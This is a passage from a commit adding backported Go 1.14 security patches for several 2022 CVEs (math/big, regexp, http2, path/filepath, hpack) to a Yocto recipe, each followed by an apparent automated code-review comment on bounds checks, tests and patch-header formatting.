7CVE: CVE-2022-32189
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9---
10 src/math/big/floatmarsh.go | 7 +++++++
11 src/math/big/floatmarsh_test.go | 12 ++++++++++++
12 src/math/big/ratmarsh.go | 6 ++++++
13 src/math/big/ratmarsh_test.go | 12 ++++++++++++
14 4 files changed, 37 insertions(+)
15
16diff --git a/src/math/big/floatmarsh.go b/src/math/big/floatmarsh.go
17index d1c1dab..990e085 100644
18--- a/src/math/big/floatmarsh.go
19+++ b/src/math/big/floatmarsh.go
20@@ -8,6 +8,7 @@ package big
21
22 import (
23 "encoding/binary"
24+ "errors"
25 "fmt"
26 )
27
28@@ -67,6 +68,9 @@ func (z *Float) GobDecode(buf []byte) error {
29 *z = Float{}
30 return nil
31 }
32+ if len(buf) < 6 {
33+ return errors.New("Float.GobDecode: buffer too small")
34+ }
35
36 if buf[0] != floatGobVersion {
37 return fmt.Errorf("Float.GobDecode: encoding version %d not supported", buf[0])
38@@ -83,6 +87,9 @@ func (z *Float) GobDecode(buf []byte) error {
39 z.prec = binary.BigEndian.Uint32(buf[2:])
40
41 if z.form == finite {
42+ if len(buf) < 10 {
43+ return errors.New("Float.GobDecode: buffer too small for finite form float")
44+ }
45 z.exp = int32(binary.BigEndian.Uint32(buf[6:]))
46 z.mant = z.mant.setBytes(buf[10:])
47 }
48diff --git a/src/math/big/floatmarsh_test.go b/src/math/big/floatmarsh_test.go
49index c056d78..401f45a 100644
50--- a/src/math/big/floatmarsh_test.go
51+++ b/src/math/big/floatmarsh_test.go
52@@ -137,3 +137,15 @@ func TestFloatJSONEncoding(t *testing.T) {
53 }
54 }
55 }
56+
57+func TestFloatGobDecodeShortBuffer(t *testing.T) {
58+ for _, tc := range [][]byte{
59+ []byte{0x1, 0x0, 0x0, 0x0},
60+ []byte{0x1, 0xfa, 0x0, 0x0, 0x0, 0x0},
61+ } {
62+ err := NewFloat(0).GobDecode(tc)
63+ if err == nil {
64+ t.Error("expected GobDecode to return error for malformed input")
65+ }
66+ }
67+}
68diff --git a/src/math/big/ratmarsh.go b/src/math/big/ratmarsh.go
69index fbc7b60..56102e8 100644
70--- a/src/math/big/ratmarsh.go
71+++ b/src/math/big/ratmarsh.go
72@@ -45,12 +45,18 @@ func (z *Rat) GobDecode(buf []byte) error {
73 *z = Rat{}
74 return nil
75 }
76+ if len(buf) < 5 {
77+ return errors.New("Rat.GobDecode: buffer too small")
78+ }
79 b := buf[0]
80 if b>>1 != ratGobVersion {
81 return fmt.Errorf("Rat.GobDecode: encoding version %d not supported", b>>1)
82 }
83 const j = 1 + 4
84 i := j + binary.BigEndian.Uint32(buf[j-4:j])
85+ if len(buf) < int(i) {
86+ return errors.New("Rat.GobDecode: buffer too small")
87+ }
88 z.a.neg = b&1 != 0
89 z.a.abs = z.a.abs.setBytes(buf[j:i])
90 z.b.abs = z.b.abs.setBytes(buf[i:])
91diff --git a/src/math/big/ratmarsh_test.go b/src/math/big/ratmarsh_test.go
92index 351d109..55a9878 100644
93--- a/src/math/big/ratmarsh_test.go
94+++ b/src/math/big/ratmarsh_test.go
95@@ -123,3 +123,15 @@ func TestRatXMLEncoding(t *testing.T) {
96 }
97 }
98 }
99+
100+func TestRatGobDecodeShortBuffer(t *testing.T) {
101+ for _, tc := range [][]byte{
102+ []byte{0x2},
103+ []byte{0x2, 0x0, 0x0, 0x0, 0xff},
104+ } {
105+ err := NewRat(1, 2).GobDecode(tc)
106+ if err == nil {
107+ t.Error("expected GobDecode to return error for malformed input")
108+ }
109+ }
110+}
111--
1122.25.1
113
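Review bot: In Rat.GobDecode the new bound `len(buf) < int(i)` runs after `i := j + binary.BigEndian.Uint32(buf[j-4:j])`, and that sum is a uint32 that can wrap for a large encoded length, so a wrapped `i` smaller than `j` passes the check and `buf[j:i]` still panics; on a 32-bit target `int(i)` can also go negative. Validating the length before adding avoids both: `ln := binary.BigEndian.Uint32(buf[j-4:j])`, then `if uint64(ln) > uint64(len(buf)-j) { return errors.New("Rat.GobDecode: buffer too small") }`, then `i := j + int(ln)`. The short-buffer test would be stronger with a case whose length field is at its maximum value. The ratmarsh.go hunk uses `errors.New` without touching that file's imports, so confirm `errors` is already imported there. GobDecode's body continues outside the hunk.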
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41715.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41715.patch
new file mode 100644
index 0000000000..fac0ebe94c
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41715.patch
@@ -0,0 +1,271 @@
1From e9017c2416ad0ef642f5e0c2eab2dbf3cba4d997 Mon Sep 17 00:00:00 2001
2From: Russ Cox <rsc@golang.org>
3Date: Wed, 28 Sep 2022 11:18:51 -0400
4Subject: [PATCH] [release-branch.go1.18] regexp: limit size of parsed regexps
5
6Set a 128 MB limit on the amount of space used by []syntax.Inst
7in the compiled form corresponding to a given regexp.
8
9Also set a 128 MB limit on the rune storage in the *syntax.Regexp
10tree itself.
11
12Thanks to Adam Korczynski (ADA Logics) and OSS-Fuzz for reporting this issue.
13
14Fixes CVE-2022-41715.
15Updates #55949.
16Fixes #55950.
17
18Change-Id: Ia656baed81564436368cf950e1c5409752f28e1b
19Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1592136
20TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
21Reviewed-by: Damien Neil <dneil@google.com>
22Run-TryBot: Roland Shoemaker <bracewell@google.com>
23Reviewed-by: Julie Qiu <julieqiu@google.com>
24Reviewed-on: https://go-review.googlesource.com/c/go/+/438501
25Run-TryBot: Carlos Amedee <carlos@golang.org>
26Reviewed-by: Carlos Amedee <carlos@golang.org>
27Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
28TryBot-Result: Gopher Robot <gobot@golang.org>
29Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
30
31Upstream-Status: Backport [https://github.com/golang/go/commit/e9017c2416ad0ef642f5e0c2eab2dbf3cba4d997]
32CVE: CVE-2022-41715
33Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
34
35---
36 src/regexp/syntax/parse.go | 145 ++++++++++++++++++++++++++++++--
37 src/regexp/syntax/parse_test.go | 13 +--
38 2 files changed, 148 insertions(+), 10 deletions(-)
39
40diff --git a/src/regexp/syntax/parse.go b/src/regexp/syntax/parse.go
41index 55bd20d..60491d5 100644
42--- a/src/regexp/syntax/parse.go
43+++ b/src/regexp/syntax/parse.go
44@@ -90,15 +90,49 @@ const (
45 // until we've allocated at least maxHeight Regexp structures.
46 const maxHeight = 1000
47
48+// maxSize is the maximum size of a compiled regexp in Insts.
49+// It too is somewhat arbitrarily chosen, but the idea is to be large enough
50+// to allow significant regexps while at the same time small enough that
51+// the compiled form will not take up too much memory.
52+// 128 MB is enough for a 3.3 million Inst structures, which roughly
53+// corresponds to a 3.3 MB regexp.
54+const (
55+ maxSize = 128 << 20 / instSize
56+ instSize = 5 * 8 // byte, 2 uint32, slice is 5 64-bit words
57+)
58+
59+// maxRunes is the maximum number of runes allowed in a regexp tree
60+// counting the runes in all the nodes.
61+// Ignoring character classes p.numRunes is always less than the length of the regexp.
62+// Character classes can make it much larger: each \pL adds 1292 runes.
63+// 128 MB is enough for 32M runes, which is over 26k \pL instances.
64+// Note that repetitions do not make copies of the rune slices,
65+// so \pL{1000} is only one rune slice, not 1000.
66+// We could keep a cache of character classes we've seen,
67+// so that all the \pL we see use the same rune list,
68+// but that doesn't remove the problem entirely:
69+// consider something like [\pL01234][\pL01235][\pL01236]...[\pL^&*()].
70+// And because the Rune slice is exposed directly in the Regexp,
71+// there is not an opportunity to change the representation to allow
72+// partial sharing between different character classes.
73+// So the limit is the best we can do.
74+const (
75+ maxRunes = 128 << 20 / runeSize
76+ runeSize = 4 // rune is int32
77+)
78+
79 type parser struct {
80 flags Flags // parse mode flags
81 stack []*Regexp // stack of parsed expressions
82 free *Regexp
83 numCap int // number of capturing groups seen
84 wholeRegexp string
85- tmpClass []rune // temporary char class work space
86- numRegexp int // number of regexps allocated
87- height map[*Regexp]int // regexp height for height limit check
88+ tmpClass []rune // temporary char class work space
89+ numRegexp int // number of regexps allocated
90+ numRunes int // number of runes in char classes
91+ repeats int64 // product of all repetitions seen
92+ height map[*Regexp]int // regexp height, for height limit check
93+ size map[*Regexp]int64 // regexp compiled size, for size limit check
94 }
95
96 func (p *parser) newRegexp(op Op) *Regexp {
97@@ -122,6 +156,104 @@ func (p *parser) reuse(re *Regexp) {
98 p.free = re
99 }
100
101+func (p *parser) checkLimits(re *Regexp) {
102+ if p.numRunes > maxRunes {
103+ panic(ErrInternalError)
104+ }
105+ p.checkSize(re)
106+ p.checkHeight(re)
107+}
108+
109+func (p *parser) checkSize(re *Regexp) {
110+ if p.size == nil {
111+ // We haven't started tracking size yet.
112+ // Do a relatively cheap check to see if we need to start.
113+ // Maintain the product of all the repeats we've seen
114+ // and don't track if the total number of regexp nodes
115+ // we've seen times the repeat product is in budget.
116+ if p.repeats == 0 {
117+ p.repeats = 1
118+ }
119+ if re.Op == OpRepeat {
120+ n := re.Max
121+ if n == -1 {
122+ n = re.Min
123+ }
124+ if n <= 0 {
125+ n = 1
126+ }
127+ if int64(n) > maxSize/p.repeats {
128+ p.repeats = maxSize
129+ } else {
130+ p.repeats *= int64(n)
131+ }
132+ }
133+ if int64(p.numRegexp) < maxSize/p.repeats {
134+ return
135+ }
136+
137+ // We need to start tracking size.
138+ // Make the map and belatedly populate it
139+ // with info about everything we've constructed so far.
140+ p.size = make(map[*Regexp]int64)
141+ for _, re := range p.stack {
142+ p.checkSize(re)
143+ }
144+ }
145+
146+ if p.calcSize(re, true) > maxSize {
147+ panic(ErrInternalError)
148+ }
149+}
150+
151+func (p *parser) calcSize(re *Regexp, force bool) int64 {
152+ if !force {
153+ if size, ok := p.size[re]; ok {
154+ return size
155+ }
156+ }
157+
158+ var size int64
159+ switch re.Op {
160+ case OpLiteral:
161+ size = int64(len(re.Rune))
162+ case OpCapture, OpStar:
163+ // star can be 1+ or 2+; assume 2 pessimistically
164+ size = 2 + p.calcSize(re.Sub[0], false)
165+ case OpPlus, OpQuest:
166+ size = 1 + p.calcSize(re.Sub[0], false)
167+ case OpConcat:
168+ for _, sub := range re.Sub {
169+ size += p.calcSize(sub, false)
170+ }
171+ case OpAlternate:
172+ for _, sub := range re.Sub {
173+ size += p.calcSize(sub, false)
174+ }
175+ if len(re.Sub) > 1 {
176+ size += int64(len(re.Sub)) - 1
177+ }
178+ case OpRepeat:
179+ sub := p.calcSize(re.Sub[0], false)
180+ if re.Max == -1 {
181+ if re.Min == 0 {
182+ size = 2 + sub // x*
183+ } else {
184+ size = 1 + int64(re.Min)*sub // xxx+
185+ }
186+ break
187+ }
188+ // x{2,5} = xx(x(x(x)?)?)?
189+ size = int64(re.Max)*sub + int64(re.Max-re.Min)
190+ }
191+
192+ if size < 1 {
193+ size = 1
194+ }
195+ p.size[re] = size
196+ return size
197+}
198+
199 func (p *parser) checkHeight(re *Regexp) {
200 if p.numRegexp < maxHeight {
201 return
202@@ -158,6 +290,7 @@ func (p *parser) calcHeight(re *Regexp, force bool) int {
203
204 // push pushes the regexp re onto the parse stack and returns the regexp.
205 func (p *parser) push(re *Regexp) *Regexp {
206+ p.numRunes += len(re.Rune)
207 if re.Op == OpCharClass && len(re.Rune) == 2 && re.Rune[0] == re.Rune[1] {
208 // Single rune.
209 if p.maybeConcat(re.Rune[0], p.flags&^FoldCase) {
210@@ -189,7 +322,7 @@ func (p *parser) push(re *Regexp) *Regexp {
211 }
212
213 p.stack = append(p.stack, re)
214- p.checkHeight(re)
215+ p.checkLimits(re)
216 return re
217 }
218
219@@ -305,7 +438,7 @@ func (p *parser) repeat(op Op, min, max int, before, after, lastRepeat string) (
220 re.Sub = re.Sub0[:1]
221 re.Sub[0] = sub
222 p.stack[n-1] = re
223- p.checkHeight(re)
224+ p.checkLimits(re)
225
226 if op == OpRepeat && (min >= 2 || max >= 2) && !repeatIsValid(re, 1000) {
227 return "", &Error{ErrInvalidRepeatSize, before[:len(before)-len(after)]}
228@@ -509,6 +642,7 @@ func (p *parser) factor(sub []*Regexp) []*Regexp {
229
230 for j := start; j < i; j++ {
231 sub[j] = p.removeLeadingString(sub[j], len(str))
232+ p.checkLimits(sub[j])
233 }
234 suffix := p.collapse(sub[start:i], OpAlternate) // recurse
235
236@@ -566,6 +700,7 @@ func (p *parser) factor(sub []*Regexp) []*Regexp {
237 for j := start; j < i; j++ {
238 reuse := j != start // prefix came from sub[start]
239 sub[j] = p.removeLeadingRegexp(sub[j], reuse)
240+ p.checkLimits(sub[j])
241 }
242 suffix := p.collapse(sub[start:i], OpAlternate) // recurse
243
244diff --git a/src/regexp/syntax/parse_test.go b/src/regexp/syntax/parse_test.go
245index 1ef6d8a..67e3c56 100644
246--- a/src/regexp/syntax/parse_test.go
247+++ b/src/regexp/syntax/parse_test.go
248@@ -484,12 +484,15 @@ var invalidRegexps = []string{
249 `(?P<>a)`,
250 `[a-Z]`,
251 `(?i)[a-Z]`,
252- `a{100000}`,
253- `a{100000,}`,
254- "((((((((((x{2}){2}){2}){2}){2}){2}){2}){2}){2}){2})",
255- strings.Repeat("(", 1000) + strings.Repeat(")", 1000),
256- strings.Repeat("(?:", 1000) + strings.Repeat(")*", 1000),
257 `\Q\E*`,
258+ `a{100000}`, // too much repetition
259+ `a{100000,}`, // too much repetition
260+ "((((((((((x{2}){2}){2}){2}){2}){2}){2}){2}){2}){2})", // too much repetition
261+ strings.Repeat("(", 1000) + strings.Repeat(")", 1000), // too deep
262+ strings.Repeat("(?:", 1000) + strings.Repeat(")*", 1000), // too deep
263+ "(" + strings.Repeat("(xx?)", 1000) + "){1000}", // too long
264+ strings.Repeat("(xx?){1000}", 1000), // too long
265+ strings.Repeat(`\pL`, 27000), // too many runes
266 }
267
268 var onlyPerl = []string{
269--
2702.25.1
271
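Review bot: checkLimits and checkSize report an oversized pattern with `panic(ErrInternalError)`, so this backport is safe only if the go 1.14 tree's parse entry point already recovers that value and turns it into an error. The `maxHeight` context lines suggest the earlier height-limit backport is present, but the recover itself is outside these hunks and should be confirmed; without it a large caller-supplied pattern would crash the process instead of returning an error. The three new methods also have no doc comments, for example `// checkLimits panics with ErrInternalError if re takes the parse over the rune, size or height limit.` above checkLimits. In the maxSize comment, `enough for a 3.3 million Inst structures` should drop the `a`.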
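--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41717.patch
@@ -0,0 +1,75 @@
+From 618120c165669c00a1606505defea6ca755cdc27 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Wed, 30 Nov 2022 16:46:33 -0500
+Subject: [PATCH] [release-branch.go1.19] net/http: update bundled
+ golang.org/x/net/http2
+
+Disable cmd/internal/moddeps test, since this update includes PRIVATE
+track fixes.
+
+For #56350.
+For #57009.
+Fixes CVE-2022-41717.
+
+Change-Id: I5c6ce546add81f361dcf0d5123fa4eaaf8f0a03b
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1663835
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/455363
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Jenny Rakoczy <jenny@golang.org>
+Reviewed-by: Michael Pratt <mpratt@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27]
+CVE-2022-41717
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/net/http/h2_bundle.go | 18 +++++++++++-------
+ 1 file changed, 11 insertions(+), 7 deletions(-)
+
+diff --git a/src/net/http/h2_bundle.go b/src/net/http/h2_bundle.go
+index 83f2a72..cc03a62 100644
+--- a/src/net/http/h2_bundle.go
++++ b/src/net/http/h2_bundle.go
+@@ -4096,6 +4096,7 @@ type http2serverConn struct {
+ headerTableSize uint32
+ peerMaxHeaderListSize uint32 // zero means unknown (default)
+ canonHeader map[string]string // http2-lower-case -> Go-Canonical-Case
++ canonHeaderKeysSize int // canonHeader keys size in bytes
+ writingFrame bool // started writing a frame (on serve goroutine or separate)
+ writingFrameAsync bool // started a frame on its own goroutine but haven't heard back on wroteFrameCh
+ needsFrameFlush bool // last frame write wasn't a flush
+@@ -4278,6 +4279,13 @@ func (sc *http2serverConn) condlogf(err error, format string, args ...interface{
+ }
+ }
+
++// maxCachedCanonicalHeadersKeysSize is an arbitrarily-chosen limit on the size
++// of the entries in the canonHeader cache.
++// This should be larger than the size of unique, uncommon header keys likely to
++// be sent by the peer, while not so high as to permit unreasonable memory usage
++// if the peer sends an unbounded number of unique header keys.
++const http2maxCachedCanonicalHeadersKeysSize = 2048
++
+ func (sc *http2serverConn) canonicalHeader(v string) string {
+ sc.serveG.check()
+ http2buildCommonHeaderMapsOnce()
+@@ -4293,14 +4301,10 @@ func (sc *http2serverConn) canonicalHeader(v string) string {
+ sc.canonHeader = make(map[string]string)
+ }
+ cv = CanonicalHeaderKey(v)
+- // maxCachedCanonicalHeaders is an arbitrarily-chosen limit on the number of
+- // entries in the canonHeader cache. This should be larger than the number
+- // of unique, uncommon header keys likely to be sent by the peer, while not
+- // so high as to permit unreaasonable memory usage if the peer sends an unbounded
+- // number of unique header keys.
+- const maxCachedCanonicalHeaders = 32
+- if len(sc.canonHeader) < maxCachedCanonicalHeaders {
++ size := 100 + len(v)*2 // 100 bytes of map overhead + key + value
++ if sc.canonHeaderKeysSize+size <= http2maxCachedCanonicalHeadersKeysSize {
+ sc.canonHeader[v] = cv
++ sc.canonHeaderKeysSize += size
+ }
+ return cv
+ }
+--
+2.30.2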
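Review bot: The trailer on patch line 24 reads `CVE-2022-41717` with no `CVE:` tag, while the other Go patches added in this commit write `CVE: CVE-2022-41722` and similar; the line should be `CVE: CVE-2022-41717`. Anything that reads the identifier from the patch header rather than from the file name would presumably miss this one, so the tag is worth making uniform. On the code itself, the new bound is a byte budget (`100 + len(v)*2` per entry against 2048), and the header could say in one sentence that this replaces the old 32-entry count, since the subject line only mentions a bundle update.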
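--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41722-1.patch
@@ -0,0 +1,53 @@
+From 94e0c36694fb044e81381d112fef3692de7cdf52 Mon Sep 17 00:00:00 2001
+From: Yasuhiro Matsumoto <mattn.jp@gmail.com>
+Date: Fri, 22 Apr 2022 10:07:51 +0900
+Subject: [PATCH 1/2] path/filepath: do not remove prefix "." when following
+ path contains ":".
+
+Fixes #52476
+
+Change-Id: I9eb72ac7dbccd6322d060291f31831dc389eb9bb
+Reviewed-on: https://go-review.googlesource.com/c/go/+/401595
+Auto-Submit: Ian Lance Taylor <iant@google.com>
+Reviewed-by: Alex Brainman <alex.brainman@gmail.com>
+Run-TryBot: Ian Lance Taylor <iant@google.com>
+Reviewed-by: Ian Lance Taylor <iant@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/9cd1818a7d019c02fa4898b3e45a323e35033290
+CVE: CVE-2022-41722
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/path/filepath/path.go | 14 +++++++++++++-
+ 1 file changed, 13 insertions(+), 1 deletion(-)
+
+diff --git a/src/path/filepath/path.go b/src/path/filepath/path.go
+index 26f1833..92dc090 100644
+--- a/src/path/filepath/path.go
++++ b/src/path/filepath/path.go
+@@ -116,9 +116,21 @@ func Clean(path string) string {
+ case os.IsPathSeparator(path[r]):
+ // empty path element
+ r++
+- case path[r] == '.' && (r+1 == n || os.IsPathSeparator(path[r+1])):
++ case path[r] == '.' && r+1 == n:
+ // . element
+ r++
++ case path[r] == '.' && os.IsPathSeparator(path[r+1]):
++ // ./ element
++ r++
++
++ for r < len(path) && os.IsPathSeparator(path[r]) {
++ r++
++ }
++ if out.w == 0 && volumeNameLen(path[r:]) > 0 {
++ // When joining prefix "." and an absolute path on Windows,
++ // the prefix should not be removed.
++ out.append('.')
++ }
+ case path[r] == '.' && path[r+1] == '.' && (r+2 == n || os.IsPathSeparator(path[r+2])):
+ // .. element: remove to last separator
+ r += 2
+--
+2.7.4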
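Review bot: Everything this patch adds to `Clean`, the separate `./ element` case and the `volumeNameLen(path[r:]) > 0` check, is removed again by CVE-2022-41722-2.patch, whose description says it reverts CL 401595, so this file seems to exist only so that 2/2 applies unchanged. The header should say so, in the way the CVE-2022-41725 prerequisites do, for example `CVE: CVE-2022-41722 #Dependency Patch`. The `Upstream-Status:` line here and in 2/2 is written `Backport from <url>` while the other patches in this commit use `Backport [<url>]`; one form should be used throughout. `Clean` starts and ends outside the hunk.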
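--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41722-2.patch
@@ -0,0 +1,104 @@
+From b8803cb711ae163b8e67897deb6cf8c49702227c Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Mon, 12 Dec 2022 16:43:37 -0800
+Subject: [PATCH 2/2] path/filepath: do not Clean("a/../c:/b") into c:\b on
+ Windows
+
+Do not permit Clean to convert a relative path into one starting
+with a drive reference. This change causes Clean to insert a .
+path element at the start of a path when the original path does not
+start with a volume name, and the first path element would contain
+a colon.
+
+This may introduce a spurious but harmless . path element under
+some circumstances. For example, Clean("a/../b:/../c") becomes `.\c`.
+
+This reverts CL 401595, since the change here supersedes the one
+in that CL.
+
+Thanks to RyotaK (https://twitter.com/ryotkak) for reporting this issue.
+
+Updates #57274
+Fixes #57276
+Fixes CVE-2022-41722
+
+Change-Id: I837446285a03aa74c79d7642720e01f354c2ca17
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1675249
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
+(cherry picked from commit 8ca37f4813ef2f64600c92b83f17c9f3ca6c03a5)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1728944
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/468119
+Reviewed-by: Than McIntosh <thanm@google.com>
+Run-TryBot: Michael Pratt <mpratt@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Auto-Submit: Michael Pratt <mpratt@google.com>
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/bdf07c2e168baf736e4c057279ca12a4d674f18c
+CVE: CVE-2022-41722
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/path/filepath/path.go | 27 ++++++++++++++-------------
+ 1 file changed, 14 insertions(+), 13 deletions(-)
+
+diff --git a/src/path/filepath/path.go b/src/path/filepath/path.go
+index 92dc090..f0f095e 100644
+--- a/src/path/filepath/path.go
++++ b/src/path/filepath/path.go
+@@ -14,6 +14,7 @@ package filepath
+ import (
+ "errors"
+ "os"
++ "runtime"
+ "sort"
+ "strings"
+ )
+@@ -116,21 +117,9 @@ func Clean(path string) string {
+ case os.IsPathSeparator(path[r]):
+ // empty path element
+ r++
+- case path[r] == '.' && r+1 == n:
++ case path[r] == '.' && (r+1 == n || os.IsPathSeparator(path[r+1])):
+ // . element
+ r++
+- case path[r] == '.' && os.IsPathSeparator(path[r+1]):
+- // ./ element
+- r++
+-
+- for r < len(path) && os.IsPathSeparator(path[r]) {
+- r++
+- }
+- if out.w == 0 && volumeNameLen(path[r:]) > 0 {
+- // When joining prefix "." and an absolute path on Windows,
+- // the prefix should not be removed.
+- out.append('.')
+- }
+ case path[r] == '.' && path[r+1] == '.' && (r+2 == n || os.IsPathSeparator(path[r+2])):
+ // .. element: remove to last separator
+ r += 2
+@@ -156,6 +145,18 @@ func Clean(path string) string {
+ if rooted && out.w != 1 || !rooted && out.w != 0 {
+ out.append(Separator)
+ }
++ // If a ':' appears in the path element at the start of a Windows path,
++ // insert a .\ at the beginning to avoid converting relative paths
++ // like a/../c: into c:.
++ if runtime.GOOS == "windows" && out.w == 0 && out.volLen == 0 && r != 0 {
++ for i := r; i < n && !os.IsPathSeparator(path[i]); i++ {
++ if path[i] == ':' {
++ out.append('.')
++ out.append(Separator)
++ break
++ }
++ }
++ }
+ // copy element
+ for ; r < n && !os.IsPathSeparator(path[r]); r++ {
+ out.append(path[r])
+--
+2.7.4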
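Review bot: The Windows-only branch added before `// copy element` comes with no test: the diffstat lists only `src/path/filepath/path.go`, so neither `Clean("a/../c:/b")` from the subject nor the `Clean("a/../b:/../c")` case from the description is pinned in this tree. If the upstream commit carried test cases they should be backported with it; otherwise one table entry for each of those two inputs would cover the fix. Because the guard is `runtime.GOOS == "windows"`, those cases only run on a Windows build of this toolchain, and the header could state how the backport was checked. `Clean` starts and ends outside the hunk.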
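--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41723.patch
@@ -0,0 +1,156 @@
+From 451766789f646617157c725e20c955d4a9a70d4e Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Mon, 6 Feb 2023 10:03:44 -0800
+Subject: [PATCH] net/http: update bundled golang.org/x/net/http2
+
+Disable cmd/internal/moddeps test, since this update includes PRIVATE
+track fixes.
+
+Fixes CVE-2022-41723
+Fixes #58355
+Updates #57855
+
+Change-Id: Ie870562a6f6e44e4e8f57db6a0dde1a41a2b090c
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1728939
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/468118
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Michael Pratt <mpratt@google.com>
+Auto-Submit: Michael Pratt <mpratt@google.com>
+Reviewed-by: Than McIntosh <thanm@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/5c3e11bd0b5c0a86e5beffcd4339b86a902b21c3]
+CVE: CVE-2022-41723
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/vendor/golang.org/x/net/http2/hpack/hpack.go | 79 +++++++++++++++---------
+ 1 file changed, 49 insertions(+), 30 deletions(-)
+
+diff --git a/src/vendor/golang.org/x/net/http2/hpack/hpack.go b/src/vendor/golang.org/x/net/http2/hpack/hpack.go
+index 85f18a2..02e80e3 100644
+--- a/src/vendor/golang.org/x/net/http2/hpack/hpack.go
++++ b/src/vendor/golang.org/x/net/http2/hpack/hpack.go
+@@ -359,6 +359,7 @@ func (d *Decoder) parseFieldLiteral(n uint8, it indexType) error {
+
+ var hf HeaderField
+ wantStr := d.emitEnabled || it.indexed()
++ var undecodedName undecodedString
+ if nameIdx > 0 {
+ ihf, ok := d.at(nameIdx)
+ if !ok {
+@@ -366,15 +367,27 @@ func (d *Decoder) parseFieldLiteral(n uint8, it indexType) error {
+ }
+ hf.Name = ihf.Name
+ } else {
+- hf.Name, buf, err = d.readString(buf, wantStr)
++ undecodedName, buf, err = d.readString(buf)
+ if err != nil {
+ return err
+ }
+ }
+- hf.Value, buf, err = d.readString(buf, wantStr)
++ undecodedValue, buf, err := d.readString(buf)
+ if err != nil {
+ return err
+ }
++ if wantStr {
++ if nameIdx <= 0 {
++ hf.Name, err = d.decodeString(undecodedName)
++ if err != nil {
++ return err
++ }
++ }
++ hf.Value, err = d.decodeString(undecodedValue)
++ if err != nil {
++ return err
++ }
++ }
+ d.buf = buf
+ if it.indexed() {
+ d.dynTab.add(hf)
+@@ -459,46 +472,52 @@ func readVarInt(n byte, p []byte) (i uint64, remain []byte, err error) {
+ return 0, origP, errNeedMore
+ }
+
+-// readString decodes an hpack string from p.
++// readString reads an hpack string from p.
+ //
+-// wantStr is whether s will be used. If false, decompression and
+-// []byte->string garbage are skipped if s will be ignored
+-// anyway. This does mean that huffman decoding errors for non-indexed
+-// strings past the MAX_HEADER_LIST_SIZE are ignored, but the server
+-// is returning an error anyway, and because they're not indexed, the error
+-// won't affect the decoding state.
+-func (d *Decoder) readString(p []byte, wantStr bool) (s string, remain []byte, err error) {
++// It returns a reference to the encoded string data to permit deferring decode costs
++// until after the caller verifies all data is present.
++func (d *Decoder) readString(p []byte) (u undecodedString, remain []byte, err error) {
+ if len(p) == 0 {
+- return "", p, errNeedMore
++ return u, p, errNeedMore
+ }
+ isHuff := p[0]&128 != 0
+ strLen, p, err := readVarInt(7, p)
+ if err != nil {
+- return "", p, err
++ return u, p, err
+ }
+ if d.maxStrLen != 0 && strLen > uint64(d.maxStrLen) {
+- return "", nil, ErrStringLength
++ // Returning an error here means Huffman decoding errors
++ // for non-indexed strings past the maximum string length
++ // are ignored, but the server is returning an error anyway
++ // and because the string is not indexed the error will not
++ // affect the decoding state.
++ return u, nil, ErrStringLength
+ }
+ if uint64(len(p)) < strLen {
+- return "", p, errNeedMore
+- }
+- if !isHuff {
+- if wantStr {
+- s = string(p[:strLen])
+- }
+- return s, p[strLen:], nil
++ return u, p, errNeedMore
+ }
++ u.isHuff = isHuff
++ u.b = p[:strLen]
++ return u, p[strLen:], nil
++}
+
+- if wantStr {
+- buf := bufPool.Get().(*bytes.Buffer)
+- buf.Reset() // don't trust others
+- defer bufPool.Put(buf)
+- if err := huffmanDecode(buf, d.maxStrLen, p[:strLen]); err != nil {
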